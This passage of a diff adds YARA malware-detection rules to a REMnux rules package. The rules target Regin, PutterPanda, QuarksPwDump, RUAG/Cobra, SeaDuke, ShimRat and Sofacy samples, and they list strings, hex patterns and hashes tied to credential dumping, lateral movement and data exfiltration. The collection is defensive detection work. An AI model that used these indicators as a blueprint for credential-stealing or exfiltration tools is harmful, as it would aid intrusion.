+		$s16 = "LookupPrivilegeValueA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.66' */ /* Goodware String - occured 336 times */
+		$s17 = "PeekNamedPipe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.65' */ /* Goodware String - occured 347 times */
+		$s18 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.59' */ /* Goodware String - occured 410 times */
+		$s19 = "PSAPI.DLL" fullword ascii /* PEStudio Blacklist: strings */ /* score: '4.58' */ /* Goodware String - occured 420 times */
+		$s20 = "SPSSSQ" fullword ascii /* score: '4.51' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 220KB and all of them
+}
+
+rule APT_Malware_PutterPanda_Gen4 {
+	meta:
+		description = "Detects Malware related to PutterPanda"
+		author = "Florian Roth"
+		score = 70
+		reference = "VT Analysis"
+		date = "2015-06-03"
+		super_rule = 1
+		hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
+		hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
+		hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
+		hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
+		hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
+	strings:
+		$x1 = "rz.dat" fullword ascii /* score: '10.00' */
+
+		$s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii /* PEStudio Blacklist: agent */ /* score: '20.03' */
+		$s1 = "Internet connect error:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.04' */
+		$s2 = "Proxy-Authorization:Basic " fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.02' */
+		$s5 = "Invalid url" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.03' */
+		$s6 = "Create file failed" fullword ascii /* score: '8.04' */
+		$s7 = "myAgent" fullword ascii /* score: '8.03' */
+
+		$z1 = "%s%s%d%d" fullword ascii /* score: '8.00' */
+		$z2 = "HttpQueryInfo failed:%d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.02' */
+		$z3 = "read file error:%d" fullword ascii /* score: '11.04' */
+		$z4 = "down file success" fullword ascii /* score: '7.04' */
+		$z5 = "kPStoreCreateInstance" fullword ascii /* score: '5.03' */
+		$z6 = "Avaliable data:%u bytes" fullword ascii /* score: '5.03' */
+		$z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii /* PEStudio Blacklist: guid */ /* score: '5.00' */ /* Goodware String - occured 2 times */
+	condition:
+		filesize < 300KB and 
+		(
+			( uint16(0) == 0x5a4d and $x1 and 3 of ($s*) ) or
+			( 3 of ($s*) and 4 of ($z*) )
+		)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_quarkspwdump.yar remnux-rules-0.0.4/yara/malware/APT_quarkspwdump.yar
--- remnux-rules-0.0.3/yara/malware/APT_quarkspwdump.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_quarkspwdump.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule QuarksPwDump_Gen {
+	meta:
+		description = "Detects all QuarksPWDump versions"
+		author = "Florian Roth"
+		date = "2015-09-29"
+		score = 80
+		hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
+		hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
+		hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
+		hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
+		hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
+		hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
+		hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
+	strings:
+		$s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
+		$s2 = "%d dumped" fullword ascii
+		$s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
+		$s4 = "\\SAM-%u.dmp" fullword ascii
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Regin.yar remnux-rules-0.0.4/yara/malware/APT_Regin.yar
--- remnux-rules-0.0.3/yara/malware/APT_Regin.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Regin.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,408 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+    Warning: Don't use this rule set without excluding the false positive hashes listed in the file falsepositive-hashes.txt from https://github.com/Neo23x0/Loki/blob/master/signatures/falsepositive-hashes.txt
+
+*/
+
+import "pe"
+rule Regin_APT_KernelDriver_Generic_A {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash2 = "06665b96e293b23acc80451abb413e50"
+		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		
+		$s0 = "atapi.sys" fullword wide
+		$s1 = "disk.sys" fullword wide
+		$s3 = "h.data" fullword ascii
+		$s4 = "\\system32" fullword ascii
+		$s5 = "\\SystemRoot" fullword ascii
+		$s6 = "system" fullword ascii
+		$s7 = "temp" fullword ascii
+		$s8 = "windows" fullword ascii
+
+		$x1 = "LRich6" fullword ascii
+		$x2 = "KeServiceDescriptorTable" fullword ascii		
+	condition:
+		$m0 at 0 and $m1 and  	
+		all of ($s*) and 1 of ($x*)
+}
+
+rule Regin_APT_KernelDriver_Generic_B {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
+		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
+		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
+		hash4 = "06665b96e293b23acc80451abb413e50"
+		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
+		hash6 = "4b6b86c7fec1c574706cecedf44abded"
+		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
+		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
+		hash10 = "1c024e599ac055312a4ab75b3950040a"
+		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
+		hash12 = "b505d65721bb2453d5039a389113b566"
+		hash13 = "b269894f434657db2b15949641a67532"
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
+		$s2 = "H.data" fullword ascii nocase
+		$s3 = "INIT" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		
+		$v1 = "\\system32" fullword ascii
+		$v2 = "\\SystemRoot" fullword ascii
+		$v3 = "KeServiceDescriptorTable" fullword ascii	
+		
+		$w1 = "\\system32" fullword ascii
+		$w2 = "\\SystemRoot" fullword ascii		
+		$w3 = "LRich6" fullword ascii
+		
+		$x1 = "_snprintf" fullword ascii
+		$x2 = "_except_handler3" fullword ascii
+		
+		$y1 = "mbstowcs" fullword ascii
+		$y2 = "wcstombs" fullword ascii
+		$y3 = "KeGetCurrentIrql" fullword ascii
+		
+		$z1 = "wcscpy" fullword ascii
+		$z2 = "ZwCreateFile" fullword ascii
+		$z3 = "ZwQueryInformationFile" fullword ascii
+		$z4 = "wcslen" fullword ascii
+		$z5 = "atoi" fullword ascii
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($v*) or all of ($w*) or all of ($x*) or all of ($y*) or all of ($z*) ) 
+		and filesize < 20KB
+}
+
+rule Regin_APT_KernelDriver_Generic_C {
+	meta:
+		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
+		author = "@Malwrsignatures - included in APT Scanner THOR"
+		date = "23.11.14"
+		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
+		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"		
+	strings:
+		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 } 
+	
+		$s0 = "KeGetCurrentIrql" fullword ascii
+		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
+		$s2 = "usbclass" fullword wide
+		
+		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
+		$x2 = "Universal Serial Bus Class Driver" fullword wide
+		$x3 = "5.2.3790.0" fullword wide
+		
+		$y1 = "LSA Shell" fullword wide
+		$y2 = "0Richw" fullword ascii		
+	condition:
+		$m0 at 0 and all of ($s*) and 
+		( all of ($x*) or all of ($y*) ) 
+		and filesize < 20KB
+}
+
+/* Update 27.11.14 */
+
+rule Regin_sig_svcsstat {
+	meta:
+		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
+	strings:
+		$s0 = "Service Control Manager" fullword ascii
+		$s1 = "_vsnwprintf" fullword ascii
+		$s2 = "Root Agency" fullword ascii
+		$s3 = "Root Agency0" fullword ascii
+		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
+		$s5 = "\\\\?\\UNC" fullword wide
+		$s6 = "%ls%ls" fullword wide
+	condition:
+		all of them and filesize < 15KB and filesize > 10KB 
+}
+
+rule Regin_Sample_1 {
+	meta:
+		description = "Auto-generated rule - file-3665415_sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
+	strings:
+		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
+		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
+		$s2 = "External Naming Failed - Status %x" fullword ascii
+		$s3 = "------- Same multiport - different interrupts" fullword ascii
+		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
+		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
+		$s6 = "Could not report legacy device - %x" fullword ascii
+		$s7 = "entering SerialGetPortInfo" fullword ascii
+		$s8 = "'user registry info - userPort: %x" fullword ascii
+		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
+		$s10 = "Kernel debugger is using port at address %X" fullword ascii
+		$s12 = "Release - freeing multi context" fullword ascii
+		$s13 = "Serial driver will not load port" fullword ascii
+		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
+		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
+		$s20 = "'user registry info - userIndexed: %d" fullword ascii
+	condition:
+		all of them and filesize < 110KB and filesize > 80KB
+}
+
+rule Regin_Sample_2 {
+	meta:
+		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
+	strings:
+		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" fullword wide
+		$s1 = "atapi.sys" fullword wide
+		$s2 = "disk.sys" fullword wide
+		$s3 = "IoGetRelatedDeviceObject" fullword ascii
+		$s4 = "HAL.dll" fullword ascii
+		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" fullword ascii
+		$s6 = "PsGetCurrentProcessId" fullword ascii
+		$s7 = "KeGetCurrentIrql" fullword ascii
+		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s9 = "KeSetImportanceDpc" fullword ascii
+		$s10 = "KeQueryPerformanceCounter" fullword ascii
+		$s14 = "KeInitializeEvent" fullword ascii
+		$s15 = "KeDelayExecutionThread" fullword ascii
+		$s16 = "KeInitializeTimerEx" fullword ascii
+		$s18 = "PsLookupProcessByProcessId" fullword ascii
+		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
+		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_3 {
+	meta:
+		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
+		author = "@Malwrsignatures"
+		date = "27.11.14"
+		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"		
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "Service Pack x" fullword wide
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
+		$s3 = "mntoskrnl.exe" fullword wide
+		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" fullword wide
+		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
+		$s6 = "Service Pack" fullword wide
+		$s7 = ".sys" fullword wide
+		$s8 = ".dll" fullword wide		
+		
+		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" fullword wide
+		$s11 = "IoGetRelatedDeviceObject" fullword ascii
+		$s12 = "VMEM.sys" fullword ascii
+		$s13 = "RtlGetVersion" fullword wide
+		$s14 = "ntkrnlpa.exe" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize > 160KB and filesize < 200KB
+}
+
+rule Regin_Sample_Set_1 {
+	meta:
+		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
+		author = "@MalwrSignatures"
+		date = "26.11.14"
+		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
+		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"		
+	strings:
+		$s0 = "HAL.dll" fullword ascii
+		$s1 = "IoGetDeviceObjectPointer" fullword ascii
+		$s2 = "MaximumPortsServiced" fullword wide
+		$s3 = "KeGetCurrentIrql" fullword ascii
+		$s4 = "ntkrnlpa.exe" fullword ascii
+		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
+		$s6 = "ConnectMultiplePorts" fullword wide
+		$s7 = "\\SYSTEMROOT" fullword wide
+		$s8 = "IoWriteErrorLogEntry" fullword ascii
+		$s9 = "KeQueryPerformanceCounter" fullword ascii
+		$s10 = "KeServiceDescriptorTable" fullword ascii
+		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
+		$s12 = "SeSinglePrivilegeCheck" fullword ascii
+		$s13 = "KeInitializeEvent" fullword ascii
+		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
+		$s15 = "KeRemoveDeviceQueue" fullword ascii
+		$s16 = "IofCompleteRequest" fullword ascii
+		$s17 = "KeInitializeSpinLock" fullword ascii
+		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
+		$s19 = "IoCreateDevice" fullword ascii
+		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+	condition:
+		all of them and filesize < 40KB and filesize > 30KB
+}
+
+rule Regin_Sample_Set_2 {
+	meta:
+		description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+		author = "@MalwrSignatures"
+		date = "27.11.14"
+		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
+		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+	strings:
+		$hd = { fe ba dc fe }
+	
+		$s0 = "d%ls%ls" fullword wide
+		$s1 = "\\\\?\\UNC" fullword wide
+		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
+		$s3 = "\\\\?\\UNC\\" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
+		$s6 = "\\\\.\\Global\\%s" fullword wide
+		$s7 = "temp" fullword wide
+		$s8 = "\\\\.\\%s" fullword wide
+		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide		
+		
+		$s10 = "sscanf" fullword ascii
+		$s11 = "disp.dll" fullword ascii
+		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
+		$s13 = "%d.%d.%d.%d%c" fullword ascii
+		$s14 = "imagehlp.dll" fullword ascii
+		$s15 = "%hd %d" fullword ascii
+	condition:
+		( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
+}
+
+rule apt_regin_legspin {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect Regin's Legspin module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "29105f46e4d33f66fee346cfd099d1cc"
+	strings:
+	    $mz="MZ"
+	    $a1="sharepw"
+	    $a2="reglist"
+	    $a3="logdump"
+	    $a4="Name:" wide
+	    $a5="Phys Avail:"
+	    $a6="cmd.exe" wide
+	    $a7="ping.exe" wide
+	    $a8="millisecs"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+rule apt_regin_hopscotch {
+	meta:
+	    copyright = "Kaspersky Lab"
+	    description = "Rule to detect Regin's Hopscotch module"
+	    version = "1.0"
+	    last_modified = "2015-01-22"
+	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
+	    md5 = "6c34031d7a5fc2b091b623981a8ae61c"
+	strings:
+
+	    $mz="MZ"
+
+	    $a1="AuthenticateNetUseIpc"
+	    $a2="Failed to authenticate to"
+	    $a3="Failed to disconnect from"
+	    $a4="%S\\ipc$" wide
+	    $a5="Not deleting..."
+	    $a6="CopyServiceToRemoteMachine"
+	    $a7="DH Exchange failed"
+	    $a8="ConnectToNamedPipes"
+	condition:
+	    ($mz at 0) and all of ($a*)
+}
+
+
+rule apt_regin_2011_32bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 32 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={331015EA261D38A7}
+$key2={9145A98BA37617DE}
+$key3={EF745F23AA67243D}
+$mz="MZ"
+condition:
+($mz at 0) and any of ($key*) and filesize < 300000
+}
+rule apt_regin_rc5key {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin RC5 decryption keys"
+ version = "1.0"
+ last_modified = "2014-11-18"
+strings:
+$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01}
+$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78}
+condition:
+any of ($key*)
+}
+
+rule apt_regin_vfs {
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin VFSes"
+	version = "1.0"
+	last_modified = "2014-11-18"
+strings:
+	$a1={00 02 00 08 00 08 03 F6 D7 F3 52}
+	$a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
+	$a3={00 04 00 10 00 10 03 C2 D3 1C 93}
+	$a4={00 04 00 10 C8 00 04 C8 93 06 D8}
+condition:
+	($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
+}
+
+rule apt_regin_dispatcher_disp_dll {
+
+meta:
+	copyright = "Kaspersky Lab"
+	author = "Kaspersky Lab"
+	description = "Rule to detect Regin disp.dll dispatcher"
+	version = "1.0"
+	last_modified = "2014-11-18"
+
+strings:
+	$mz="MZ"
+	$string1="shit"
+	$string2="disp.dll"
+	$string3="255.255.255.255"
+	$string4="StackWalk64"
+	$string5="imagehlp.dll"
+condition:
+	($mz at 0) and (all of ($string*))
+}
+
+rule apt_regin_2013_64bit_stage1 {
+meta:
+copyright = "Kaspersky Lab"
+ description = "Rule to detect Regin 64 bit stage 1 loaders"
+ version = "1.0"
+ last_modified = "2014-11-18"
+ filename="wshnetc.dll"
+ md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
+ filename="wsharp.dll"
+ md5="c053a0a3f1edcbbfc9b51bc640e808ce"
+strings:
+$mz="MZ"
+$a1="PRIVHEAD"
+$a2="\\\\.\\PhysicalDrive%d"
+$a3="ZwDeviceIoControlFile"
+condition:
+($mz at 0) and (all of ($a*)) and filesize < 100000
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Ruag.yar remnux-rules-0.0.4/yara/malware/APT_Ruag.yar
--- remnux-rules-0.0.3/yara/malware/APT_Ruag.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Ruag.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,90 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+  Yara Rule Set
+  Author: Florian Roth
+  Date: 2016-05-23
+  Identifier: Swiss RUAG APT Case
+  Reference: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case 
+*/
+
+rule RUAG_Tavdig_Malformed_Executable {
+  meta:
+    description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
+    author = "Florian Roth"
+    reference = "https://goo.gl/N5MEj0"
+    score = 60
+  condition:
+    uint16(0) == 0x5a4d and /* MZ Header */
+    uint32(uint32(0x3C)) == 0x0000AD0B /* malformed PE header > 0x0bad */
+}
+
+rule RUAG_Bot_Config_File {
+  meta:
+    description = "Detects a specific config file used by malware in RUAG APT case"
+    author = "Florian Roth"
+    reference = "https://goo.gl/N5MEj0"
+    score = 60
+  strings:
+    $s1 = "[CONFIG]" ascii
+    $s2 = "name = " ascii
+    $s3 = "exe = cmd.exe" ascii
+  condition:
+    $s1 at 0 and $s2 and $s3 and filesize < 160 
+}
+
+rule RUAG_Cobra_Malware {
+  meta:
+    description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
+    author = "Florian Roth"
+    reference = "https://goo.gl/N5MEj0"
+    score = 60
+  strings:
+    $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
+  condition:
+    uint16(0) == 0x5a4d and $s1
+}
+
+rule RUAG_Cobra_Config_File {
+  meta:
+    description = "Detects a config text file used by malware Cobra in RUAG case"
+    author = "Florian Roth"
+    reference = "https://goo.gl/N5MEj0"
+    score = 60
+  strings:
+    $h1 = "[NAME]" ascii
+
+    $s1 = "object_id=" ascii
+    $s2 = "[TIME]" ascii fullword
+    $s3 = "lastconnect" ascii 
+    $s4 = "[CW_LOCAL]" ascii fullword
+    $s5 = "system_pipe" ascii
+    $s6 = "user_pipe" ascii
+    $s7 = "[TRANSPORT]" ascii
+    $s8 = "run_task_system" ascii
+    $s9 = "[WORKDATA]" ascii 
+    $s10 = "address1" ascii
+  condition:
+    $h1 at 0 and 8 of ($s*) and filesize < 5KB
+}
+
+rule RUAG_Exfil_Config_File {
+  meta:
+    description = "Detects a config text file used in data exfiltration in RUAG case"
+    author = "Florian Roth"
+    reference = "https://goo.gl/N5MEj0"
+    score = 60
+  strings:
+    $h1 = "[TRANSPORT]" ascii
+
+    $s1 = "system_pipe" ascii
+    $s2 = "spstatus" ascii
+    $s3 = "adaptable" ascii 
+    $s4 = "post_frag" ascii
+    $s5 = "pfsgrowperiod" ascii
+  condition:
+    $h1 at 0 and all of ($s*) and filesize < 1KB
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Seaduke_Unit42.yar remnux-rules-0.0.4/yara/malware/APT_Seaduke_Unit42.yar
--- remnux-rules-0.0.3/yara/malware/APT_Seaduke_Unit42.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Seaduke_Unit42.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule SeaDuke_Sample {
+	meta:
+		description = "SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d"
+		author = "Florian Roth"
+		reference = "http://goo.gl/MJ0c2M"
+		date = "2015-07-14"
+		score = 70
+		hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
+	strings:
+		$s0 = "bpython27.dll" fullword ascii
+		$s1 = "email.header(" fullword ascii /* PEStudio Blacklist: strings */
+		$s2 = "LogonUI.exe" fullword wide /* PEStudio Blacklist: strings */
+		$s3 = "Crypto.Cipher.AES(" fullword ascii /* PEStudio Blacklist: strings */
+		$s4 = "mod is NULL - %s" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 4000KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_ShimRat.yar remnux-rules-0.0.4/yara/malware/APT_ShimRat.yar
--- remnux-rules-0.0.3/yara/malware/APT_ShimRat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_ShimRat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,55 @@
+rule shimrat
+{
+ meta:
+  description = "Detects ShimRat and the ShimRat loader"
+  author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+  date = "20/11/2015"
+  ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
+  
+ strings:
+  $dll = ".dll"
+  $dat = ".dat"
+  $headersig = "QWERTYUIOPLKJHG"
+  $datasig = "MNBVCXZLKJHGFDS"
+  $datamarker1 = "Data$$00"
+  $datamarker2 = "Data$$01%c%sData"
+  $cmdlineformat = "ping localhost -n 9 /c %s > nul"
+  $demoproject_keyword1 = "Demo"
+  $demoproject_keyword2 = "Win32App"
+  $comspec = "COMSPEC"
+  $shim_func1 = "ShimMain"
+  $shim_func2 = "NotifyShims"
+  $shim_func3 = "GetHookAPIs"
+
+
+ condition:
+  ($dll and $dat and $headersig and $datasig) or ($datamarker1 and $datamarker2) or ($cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec) or ($dll and $dat and $shim_func1 and $shim_func2 and $shim_func3)
+}
+
+rule shimratreporter
+{
+ meta:
+  description = "Detects ShimRatReporter"
+  author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+  date = "20/11/2015"
+  ref = "https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/"
+
+
+ strings:
+  $IpInfo = "IP-INFO"
+  $NetworkInfo = "Network-INFO"
+  $OsInfo = "OS-INFO"
+  $ProcessInfo = "Process-INFO"
+  $BrowserInfo = "Browser-INFO"
+  $QueryUserInfo = "QueryUser-INFO"
+  $UsersInfo = "Users-INFO"
+  $SoftwareInfo = "Software-INFO"
+  $AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
+  $proxy_str = "(from environment) = %s"
+
+  $netuserfun = "NetUserEnum"
+  $networkparams = "GetNetworkParams"
+
+ condition:
+  all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Sofacy_Fysbis.yar remnux-rules-0.0.4/yara/malware/APT_Sofacy_Fysbis.yar
--- remnux-rules-0.0.3/yara/malware/APT_Sofacy_Fysbis.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Sofacy_Fysbis.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-02-13
+	Identifier: Sofacy Fysbis
+*/
+
+rule Sofacy_Fybis_ELF_Backdoor_Gen1 {
+	meta:
+		description = "Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1"
+		author = "Florian Roth"
+		reference = "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/"
+		date = "2016-02-13"
+		score = 80
+		hash1 = "02c7cf55fd5c5809ce2dce56085ba43795f2480423a4256537bfdfda0df85592"
+		hash2 = "8bca0031f3b691421cb15f9c6e71ce193355d2d8cf2b190438b6962761d0c6bb"
+	strings:
